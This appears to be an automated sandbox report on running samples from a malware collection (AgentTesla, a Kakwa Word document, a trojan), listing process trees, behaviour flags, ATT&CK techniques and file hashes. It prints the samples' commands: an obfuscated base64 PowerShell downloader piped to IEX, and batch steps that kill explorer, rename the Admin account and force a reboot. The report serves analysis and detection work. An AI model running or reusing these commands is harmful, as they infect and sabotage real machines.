  PID:3744
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1928,15137610967826431189,4018935867638331075,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4900 /prefetch:8
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4640
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1928,15137610967826431189,4018935867638331075,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6084 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:2644
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1928,15137610967826431189,4018935867638331075,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2916 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2880
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,15137610967826431189,4018935867638331075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7512 /prefetch:1
  2⤵
  PID:440
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,15137610967826431189,4018935867638331075,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8084 /prefetch:1
  2⤵
  PID:3544

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3024

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1652

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
1⤵
PID:4944

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x0000000000000480 0x00000000000004D0
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2296

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4500

C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Joke\CookieClickerHack.exe
"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Joke\CookieClickerHack.exe"
1⤵
PID:4588

C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Joke\Avoid.exe
"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Joke\Avoid.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:1092

C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Spyware\AgentTesla.exe
"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Spyware\AgentTesla.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3552

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Spyware\Kakwa.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2968
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C p^ow^Ers^HE^lL -e WwBzAFkAUwBUAGUATQAuAFQARQB4AHQALgBFAE4AYwBvAGQASQBuAEcAXQA6ADoAVQBuAEkAYwBvAGQAZQAuAEcARQBUAHMAVAByAEkAbgBHACgAWwBTAHkAcwB0AGUATQAuAGMATwBuAFYAZQByAHQAXQA6ADoARgByAG8AbQBCAEEAUwBFADYANABzAHQAcgBpAE4ARwAoACIAZABBAEIAeQBBAEgAawBBAGUAdwBCAG0AQQBHADgAQQBjAGcAQQBnAEEAQwBnAEEASgBBAEIAcABBAEQAMABBAE0AUQBBADcAQQBDAEEAQQBKAEEAQgBwAEEAQwBBAEEATABRAEIAcwBBAEcAVQBBAEkAQQBBAHgAQQBEAEEAQQBPAHcAQQBnAEEAQwBRAEEAYQBRAEEAcgBBAEMAcwBBAEsAUQBBAGcAQQBIAHMAQQBKAEEAQgBwAEEAQwB3AEEASQBnAEIAZwBBAEcANABBAEkAZwBCADkAQQBIADAAQQBZAHcAQgBoAEEASABRAEEAWQB3AEIAbwBBAEgAcwBBAGYAUQBBAGcAQQBHAFkAQQBkAFEAQgB1AEEARwBNAEEAZABBAEIAcABBAEcAOABBAGIAZwBBAGcAQQBIAGsAQQBaAFEAQgB0AEEARwBRAEEAYQBnAEEAZwBBAEMAZwBBAEkAQQBBAGsAQQBIAFUAQQBZAFEAQgAyAEEASABVAEEASQBBAEEAcwBBAEMAQQBBAEoAQQBCAHcAQQBIAFkAQQBhAEEAQgBuAEEAQwBBAEEASwBRAEEATgBBAEEAbwBBAGUAdwBCAHAAQQBFADAAQQBjAEEAQgB2AEEARgBJAEEAZABBAEEAdABBAEUAMABBAFQAdwBCAEUAQQBGAFUAQQBUAEEAQgBsAEEAQwBBAEEAUQBnAEIASgBBAEgAUQBBAGMAdwBCAFUAQQBIAEkAQQBRAFEAQgB1AEEARgBNAEEAUgBnAEIAbABBAEgASQBBAE8AdwBBAE4AQQBBAG8AQQBjAHcAQgAwAEEARwBFAEEAVQBnAEIAMABBAEMAMABBAFkAZwBCAHAAQQBIAFEAQQBVAHcAQgBVAEEASABJAEEAUQBRAEIATwBBAEYATQBBAFIAZwBCAGwAQQBGAEkAQQBJAEEAQQB0AEEASABNAEEAVAB3AEIAMQBBAEYASQBBAFkAdwBCAEYAQQBDAEEAQQBKAEEAQgAxAEEARwBFAEEAZABnAEIAMQBBAEMAQQBBAEwAUQBCAGsAQQBFAFUAQQBjAHcAQgBVAEEARwBrAEEAVABnAEIAaABBAEgAUQBBAFMAUQBCAHYAQQBHADQAQQBJAEEAQQBrAEEASABBAEEAZABnAEIAbwBBAEcAYwBBAE8AdwBBAGcAQQBDAFkAQQBJAEEAQQBrAEEASABBAEEAZABnAEIAbwBBAEcAYwBBAE8AdwBCADkAQQBBADAAQQBDAGcAQgAwAEEASABJAEEAZQBRAEIANwBBAEMAUQBBAFoAQQBCADQAQQBIAG8AQQBaAGcAQgA0AEEASABNAEEAYgBnAEIAcQBBAEgAZwBBAFAAUQBCAGIAQQBFAFUAQQBUAGcAQgAyAEEARQBrAEEAVQBnAEIAdgBBAEUANABBAGIAUQBCAEYAQQBHADQAQQBkAEEAQgBkAEEARABvAEEATwBnAEIAbgBBAEUAVQBBAGQAQQBCAEcAQQBHADgAQQBUAEEAQgBFAEEARQBVAEEAYwBnAEIAUQBBAEUARQBBAFYAQQBCAG8AQQBDAGcAQQBKAHcAQgBOAEEARgBrAEEAUgBBAEIAUABBAEcATQBBAFYAUQBCAE4AQQBHAFUAQQBUAGcAQgBVAEEASABNAEEASgB3AEEAcABBAEMAcwBBAEoAdwBCAGMAQQBIAFUAQQBhAGcAQgBvAEEARwA0AEEAWQB3AEIAcgBBAEcARQBBAGEAdwBCADMAQQBHAEUAQQBMAGcAQgBsAEEASABnAEEAWgBRAEEAbgBBAEQAcwBBAEQAUQBBAEsAQQBIAGsAQQBaAFEAQgB0AEEARwBRAEEAYQBnAEEAZwBBAEMAYwBBAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAMABBAFoAUQBCAG4AQQBHAEUAQQBZAGcAQgA1AEEASABRAEEAWgBRAEIAdABBAEcARQBBAGIAZwBCADAAQQBHADgAQQBiAFEAQQB1AEEARwBNAEEAYgB3AEIAdABBAEMAOABBAGIAQQBCADEAQQBHAE0AQQBhAHcAQQB2AEEASABJAEEAWgBRAEIAdABBAEgASQBBAFkAUQBCAGgAQQBIAFEAQQBMAGcAQgBsAEEASABnAEEAWgBRAEEAbgBBAEMAQQBBAEoAQQBCAGsAQQBIAGcAQQBlAGcAQgBtAEEASABnAEEAYwB3AEIAdQBBAEcAbwBBAGUAQQBBADcAQQBBADAAQQBDAGcAQQBrAEEARwA0AEEAYQBnAEIAbgBBAEgARQBBAGUAZwBCAHkAQQBEADAAQQBXAHcAQgBGAEEARwA0AEEAZABnAEIAcABBAEgASQBBAFQAdwBCAHUAQQBFADAAQQBaAFEAQgBPAEEASABRAEEAWABRAEEANgBBAEQAbwBBAFoAdwBCAEYAQQBIAFEAQQBaAGcAQgBQAEEARwB3AEEAWgBBAEIAbABBAEYASQBBAGMAQQBCAEIAQQBIAFEAQQBTAEEAQQBvAEEAQwBjAEEAVABRAEIAWgBBAEgAQQBBAGEAUQBCAEQAQQBGAFEAQQBWAFEAQgB5AEEARQBVAEEAVQB3AEEAbgBBAEMAawBBAEsAdwBBAG4AQQBGAHcAQQBhAEEAQgBoAEEARwBvAEEAWQBRAEIAQQBBAEcARQBBAGMAdwBCAG8AQQBHAEUAQQBhAEEAQgBoAEEASABNAEEATABnAEIAbABBAEgAZwBBAFoAUQBBAG4AQQBEAHMAQQBEAFEAQQBLAEEASABrAEEAWgBRAEIAdABBAEcAUQBBAGEAZwBBAGcAQQBDAGMAQQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHADAAQQBaAFEAQgBuAEEARwBFAEEAWQBnAEIANQBBAEgAUQBBAFoAUQBCAHQAQQBHAEUAQQBiAGcAQgAwAEEARwA4AEEAYgBRAEEAdQBBAEcATQBBAGIAdwBCAHQAQQBDADgAQQBiAEEAQgAxAEEARwBNAEEAYQB3AEEAdgBBAEgAQQBBAFkAUQBCAHkAQQBHAEUAQQBZAFEAQgAwAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBAGcAQQBDAFEAQQBiAGcAQgBxAEEARwBjAEEAYwBRAEIANgBBAEgASQBBAE8AdwBBAE4AQQBBAG8AQQBmAFEAQgBqAEEARwBFAEEAZABBAEIAagBBAEcAZwBBAGUAdwBCADkAQQBBAD0APQAiACkAKQB8AEkARQBYAA==
  2⤵
  - Process spawned unexpected child process
  PID:3964
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powErsHElL -e WwBzAFkAUwBUAGUATQAuAFQARQB4AHQALgBFAE4AYwBvAGQASQBuAEcAXQA6ADoAVQBuAEkAYwBvAGQAZQAuAEcARQBUAHMAVAByAEkAbgBHACgAWwBTAHkAcwB0AGUATQAuAGMATwBuAFYAZQByAHQAXQA6ADoARgByAG8AbQBCAEEAUwBFADYANABzAHQAcgBpAE4ARwAoACIAZABBAEIAeQBBAEgAawBBAGUAdwBCAG0AQQBHADgAQQBjAGcAQQBnAEEAQwBnAEEASgBBAEIAcABBAEQAMABBAE0AUQBBADcAQQBDAEEAQQBKAEEAQgBwAEEAQwBBAEEATABRAEIAcwBBAEcAVQBBAEkAQQBBAHgAQQBEAEEAQQBPAHcAQQBnAEEAQwBRAEEAYQBRAEEAcgBBAEMAcwBBAEsAUQBBAGcAQQBIAHMAQQBKAEEAQgBwAEEAQwB3AEEASQBnAEIAZwBBAEcANABBAEkAZwBCADkAQQBIADAAQQBZAHcAQgBoAEEASABRAEEAWQB3AEIAbwBBAEgAcwBBAGYAUQBBAGcAQQBHAFkAQQBkAFEAQgB1AEEARwBNAEEAZABBAEIAcABBAEcAOABBAGIAZwBBAGcAQQBIAGsAQQBaAFEAQgB0AEEARwBRAEEAYQBnAEEAZwBBAEMAZwBBAEkAQQBBAGsAQQBIAFUAQQBZAFEAQgAyAEEASABVAEEASQBBAEEAcwBBAEMAQQBBAEoAQQBCAHcAQQBIAFkAQQBhAEEAQgBuAEEAQwBBAEEASwBRAEEATgBBAEEAbwBBAGUAdwBCAHAAQQBFADAAQQBjAEEAQgB2AEEARgBJAEEAZABBAEEAdABBAEUAMABBAFQAdwBCAEUAQQBGAFUAQQBUAEEAQgBsAEEAQwBBAEEAUQBnAEIASgBBAEgAUQBBAGMAdwBCAFUAQQBIAEkAQQBRAFEAQgB1AEEARgBNAEEAUgBnAEIAbABBAEgASQBBAE8AdwBBAE4AQQBBAG8AQQBjAHcAQgAwAEEARwBFAEEAVQBnAEIAMABBAEMAMABBAFkAZwBCAHAAQQBIAFEAQQBVAHcAQgBVAEEASABJAEEAUQBRAEIATwBBAEYATQBBAFIAZwBCAGwAQQBGAEkAQQBJAEEAQQB0AEEASABNAEEAVAB3AEIAMQBBAEYASQBBAFkAdwBCAEYAQQBDAEEAQQBKAEEAQgAxAEEARwBFAEEAZABnAEIAMQBBAEMAQQBBAEwAUQBCAGsAQQBFAFUAQQBjAHcAQgBVAEEARwBrAEEAVABnAEIAaABBAEgAUQBBAFMAUQBCAHYAQQBHADQAQQBJAEEAQQBrAEEASABBAEEAZABnAEIAbwBBAEcAYwBBAE8AdwBBAGcAQQBDAFkAQQBJAEEAQQBrAEEASABBAEEAZABnAEIAbwBBAEcAYwBBAE8AdwBCADkAQQBBADAAQQBDAGcAQgAwAEEASABJAEEAZQBRAEIANwBBAEMAUQBBAFoAQQBCADQAQQBIAG8AQQBaAGcAQgA0AEEASABNAEEAYgBnAEIAcQBBAEgAZwBBAFAAUQBCAGIAQQBFAFUAQQBUAGcAQgAyAEEARQBrAEEAVQBnAEIAdgBBAEUANABBAGIAUQBCAEYAQQBHADQAQQBkAEEAQgBkAEEARABvAEEATwBnAEIAbgBBAEUAVQBBAGQAQQBCAEcAQQBHADgAQQBUAEEAQgBFAEEARQBVAEEAYwBnAEIAUQBBAEUARQBBAFYAQQBCAG8AQQBDAGcAQQBKAHcAQgBOAEEARgBrAEEAUgBBAEIAUABBAEcATQBBAFYAUQBCAE4AQQBHAFUAQQBUAGcAQgBVAEEASABNAEEASgB3AEEAcABBAEMAcwBBAEoAdwBCAGMAQQBIAFUAQQBhAGcAQgBvAEEARwA0AEEAWQB3AEIAcgBBAEcARQBBAGEAdwBCADMAQQBHAEUAQQBMAGcAQgBsAEEASABnAEEAWgBRAEEAbgBBAEQAcwBBAEQAUQBBAEsAQQBIAGsAQQBaAFEAQgB0AEEARwBRAEEAYQBnAEEAZwBBAEMAYwBBAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAMABBAFoAUQBCAG4AQQBHAEUAQQBZAGcAQgA1AEEASABRAEEAWgBRAEIAdABBAEcARQBBAGIAZwBCADAAQQBHADgAQQBiAFEAQQB1AEEARwBNAEEAYgB3AEIAdABBAEMAOABBAGIAQQBCADEAQQBHAE0AQQBhAHcAQQB2AEEASABJAEEAWgBRAEIAdABBAEgASQBBAFkAUQBCAGgAQQBIAFEAQQBMAGcAQgBsAEEASABnAEEAWgBRAEEAbgBBAEMAQQBBAEoAQQBCAGsAQQBIAGcAQQBlAGcAQgBtAEEASABnAEEAYwB3AEIAdQBBAEcAbwBBAGUAQQBBADcAQQBBADAAQQBDAGcAQQBrAEEARwA0AEEAYQBnAEIAbgBBAEgARQBBAGUAZwBCAHkAQQBEADAAQQBXAHcAQgBGAEEARwA0AEEAZABnAEIAcABBAEgASQBBAFQAdwBCAHUAQQBFADAAQQBaAFEAQgBPAEEASABRAEEAWABRAEEANgBBAEQAbwBBAFoAdwBCAEYAQQBIAFEAQQBaAGcAQgBQAEEARwB3AEEAWgBBAEIAbABBAEYASQBBAGMAQQBCAEIAQQBIAFEAQQBTAEEAQQBvAEEAQwBjAEEAVABRAEIAWgBBAEgAQQBBAGEAUQBCAEQAQQBGAFEAQQBWAFEAQgB5AEEARQBVAEEAVQB3AEEAbgBBAEMAawBBAEsAdwBBAG4AQQBGAHcAQQBhAEEAQgBoAEEARwBvAEEAWQBRAEIAQQBBAEcARQBBAGMAdwBCAG8AQQBHAEUAQQBhAEEAQgBoAEEASABNAEEATABnAEIAbABBAEgAZwBBAFoAUQBBAG4AQQBEAHMAQQBEAFEAQQBLAEEASABrAEEAWgBRAEIAdABBAEcAUQBBAGEAZwBBAGcAQQBDAGMAQQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHADAAQQBaAFEAQgBuAEEARwBFAEEAWQBnAEIANQBBAEgAUQBBAFoAUQBCAHQAQQBHAEUAQQBiAGcAQgAwAEEARwA4AEEAYgBRAEEAdQBBAEcATQBBAGIAdwBCAHQAQQBDADgAQQBiAEEAQgAxAEEARwBNAEEAYQB3AEEAdgBBAEgAQQBBAFkAUQBCAHkAQQBHAEUAQQBZAFEAQgAwAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBAGcAQQBDAFEAQQBiAGcAQgBxAEEARwBjAEEAYwBRAEIANgBBAEgASQBBAE8AdwBBAE4AQQBBAG8AQQBmAFEAQgBqAEEARwBFAEEAZABBAEIAagBBAEcAZwBBAGUAdwBCADkAQQBBAD0APQAiACkAKQB8AEkARQBYAA==
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5192

C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\000.exe
"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\000.exe"
1⤵
- Enumerates connected drives
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:5884
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\windl.bat""
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5948
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im explorer.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5416
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im taskmgr.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3968
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic useraccount where name='Admin' set FullName='UR NEXT'
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:1704
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic useraccount where name='Admin' rename 'UR NEXT'
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5744
- - C:\Windows\SysWOW64\shutdown.exe
    shutdown /f /r /t 0
    3⤵
    PID:3044

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa39d1055 /state1:0x41c64e6d
1⤵
PID:2824

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
4c1a24fa898d2a98b540b20272c8e47b

SHA1
3218bff9ce95b52842fa1b8bd00be073177141ef

SHA256
bbcc378fcbf64580e7a48b4e7ca9be57fa0a1f2e747f488325685bdb18d73a95

SHA512
e61f196e7f1c9a5fe249abe9b11eea770fb2f4babc61f60b12c71f43e6fe9354cf14869daf46abc2c2655bce180252acd43c10562a2dcd31fa7d90d33253820e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
f1d2c7fd2ca29bb77a5da2d1847fbb92

SHA1
840de2cf36c22ba10ac96f90890b6a12a56526c6

SHA256
58d0f80310f4a84f687c5ce0adaa982eb42fe4480510399fa2ae975d40bb8bc5

SHA512
ede1fafea2404f16948fe0b5ea5161ccee3ee6e40c55ff98c337eac981a6776b9c73dc030a5c59e4347aec91259f497539206e71949c33adcecbf2c846709e14

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000005

Filesize
62KB

MD5
c813a1b87f1651d642cdcad5fca7a7d8

SHA1
0e6628997674a7dfbeb321b59a6e829d0c2f4478

SHA256
df670e09f278fea1d0684afdcd0392a83d7041585ba5996f7b527974d7d98ec3

SHA512
af0d024ba1faafbd6f950c67977ed126827180a47cea9758ee51a95d13436f753eb5a7aa12a9090048a70328f6e779634c612aebde89b06740ffd770751e1c5b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000006

Filesize
67KB

MD5
69df804d05f8b29a88278b7d582dd279

SHA1
d9560905612cf656d5dd0e741172fb4cd9c60688

SHA256
b885987a52236f56ce7a5ca18b18533e64f62ab64eb14050ede93c93b5bd5608

SHA512
0ef49eeeeb463da832f7d5b11f6418baa65963de62c00e71d847183e0035be03e63c097103d30329582fe806d246e3c0e3ecab8b2498799abbb21d8b7febdc0e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000007

Filesize
19KB

MD5
1bd4ae71ef8e69ad4b5ffd8dc7d2dcb5

SHA1
6dd8803e59949c985d6a9df2f26c833041a5178c

SHA256
af18b3681e8e2a1e8dc34c2aa60530dc8d8a9258c4d562cbe20c898d5de98725

SHA512
b3ff083b669aca75549396250e05344ba2f1c021468589f2bd6f1b977b7f11df00f958bbbd22f07708b5d30d0260f39d8de57e75382b3ab8e78a2c41ef428863

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000008

Filesize
63KB

MD5
226541550a51911c375216f718493f65

SHA1
f6e608468401f9384cabdef45ca19e2afacc84bd

SHA256
caecff4179910ce0ff470f9fa9eb4349e8fb717fa1432cf19987450a4e1ef4a5

SHA512
2947b309f15e0e321beb9506861883fde8391c6f6140178c7e6ee7750d6418266360c335477cae0b067a6a6d86935ec5f7acdfdacc9edffa8b04ec71be210516

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001d

Filesize
202KB

MD5
9901c48297a339c554e405b4fefe7407

SHA1
5182e80bd6d4bb6bb1b7f0752849fe09e4aa330e

SHA256
9a5974509d9692162d491cf45136f072c54ddc650b201336818c76a9f257d4d2

SHA512
b68ef68c4dcc31716ce25d486617f6ef929ddbb8f7030dd4838320e2803dd6dd1c83966b3484d2986b19f3bd866484c5a432f4f6533bb3e72f5c7457a9bb9742

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
d33a1a1ede1f33b89b4382ff1b543311

SHA1
7ff89bd6eb5b3f9cc7b60b80c22f3b7d49dc8d18

SHA256
52b9bae45e585f41bbd29ef3b4d4a9079c821721d41da14c5d5051771ce77c82

SHA512
d9b242f587e7e12d3710ac90cbf388c63944e5d2e4d17bd7912f62f513f77217e2ca8a62fa04cd054bcc47713635ecc6505f4c7e31d6bd203e397b0d7a1ad6e6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
3KB

MD5
2b79d8d23804ced2331b7304be8e3ef7

SHA1
fe656e0501b263b1ebe5db6620e498ae87f65148

SHA256
644e3a27aadc02e2edbb4dd663f4ff346a1509f8887e51819f3e93e0daac9f16

SHA512
c6cc10921c6251ba9154774b131cdfc9304a9995075e40ef7b2d7ec73c2027c14e15ab5d4cb9944c488cec91ec0d420db1d04eb54f7b38b2b55c4e9a978f8e4b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
96B

MD5
5a54954727570e3d9bf57f8390197595

SHA1
b022a50739316c4294ddcd784648b8e0abbfa5bf

SHA256
b812159b3779bb0cb486ca66f124545a59841dc7f3bfb02ac41ac4a332bc7c98

SHA512
37a145fd3f354bdde0492c256bea82323858da9c5c2ec62cc1db7114cea1c1ab26172ff09e7ef4ec05935815e0f0ca150cbdc40ef2fda7ec2b32d0a8f432da57

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
111B

MD5
807419ca9a4734feaf8d8563a003b048

SHA1
a723c7d60a65886ffa068711f1e900ccc85922a6

SHA256
aa10bf07b0d265bed28f2a475f3564d8ddb5e4d4ffee0ab6f3a0cc564907b631

SHA512
f10d496ae75db5ba412bd9f17bf0c7da7632db92a3fabf7f24071e40f5759c6a875ad8f3a72bad149da58b3da3b816077df125d0d9f3544adba68c66353d206c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
1KB

MD5
4bac60bb40537b93226727517b2c29d4

SHA1
190d1a3ca4ebf87a5e0108e1ba9592c3398f5dc4

SHA256
55a448fe78e0cfd49a60c63f2040ea807a3ca35487e2164aaea061d8bb932663

SHA512
a5e5bc6bd2a380f8a0f2e81176b412e7710221fc59d7d28a6fa7b6a8420bda6c61faeb3e6766540c53ba78b78064376992f1f39688930b9f32e0e401f74f6907

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
7dd396402e424f49dcb34bfa46e0b9d3

SHA1
84386d134060294fbcbbf49a28b35385b86e1e7c

SHA256
80efa874627cf11282cda06d49b9cae1c9dc9b6d2fa51bda1ed91b88cc1745ae

SHA512
018234987c78fd01feea0920f86be2a0b3a9b43f44ffb0337744284fe4336eaaee1c6e875f5fdea669bae4441d5b1f180e64ef1abddacc9a1d4d59eb21f01fa0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
db570029e67b788474d5a64d2b7c867a

SHA1
1f6a4b0cd16da05f7b4937183f360a3890e14dad

SHA256
a1a3b872cf8d0cff7ecfd1c4a7798bbf8c4e44f12214d77c2bef633f41b92f55

SHA512
405ce7412439513a5553614a0f6da974ee228c4579ceac6b325e548070655c12bd9e5a746560d0678e6a9615df29532ec1cde027003fe1b0e2d2b6365197632f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
4a0de74f36b613b9dc763d9ee69023e2

SHA1
3ef1b7934108905df9eba149ca37cfa2cf085669

SHA256
0f45f19b283d647cfaba5f783c111716d24c0f73f18e0761ff4d1a49468f5fba

SHA512
4521f88e09088b0d1de815ec44bf44800f40095014ead88919d8530a862dae2d0b95609970d9914e5fc778c8d4a29b95159f07ecf5ce2fcb8f606b9d0a5ae096

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
05aab3e8b8310fd3dc53719a94e0f317

SHA1
486cfa7311996244bbe3b9e2db7aea3fe8e9b81d

SHA256
dc1ff8852994cf985f9e3822c9958465b0dd74a036e2400ea9ef4a5a96fa9a87

SHA512
79d9be4be10ff96745f9df1940940587bfe4edbc1a32636ec987c0eb7bea319ce4f8b2a71e0124812355e8d0f20637c9550de7e9598dc6810a1e2c7cb44a5b79

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
0c11c794a21709d67e9ab2fb7cf36967

SHA1
32263235d0661bc3cfb7066dc596a290c83a90bf

SHA256
cac692101093e7ac59073af10da571b5358b6daddb86bf84ee6c5b6a6a138140

SHA512
5bb88d4e88d496b544402e0c54df543b4369eea66014ed7fdea92ab4dd8b2cd17bec470fb69afe9eb201c340a2adc0e0349f1bc70455f9a2114ad252ef7baf77

Download Submit
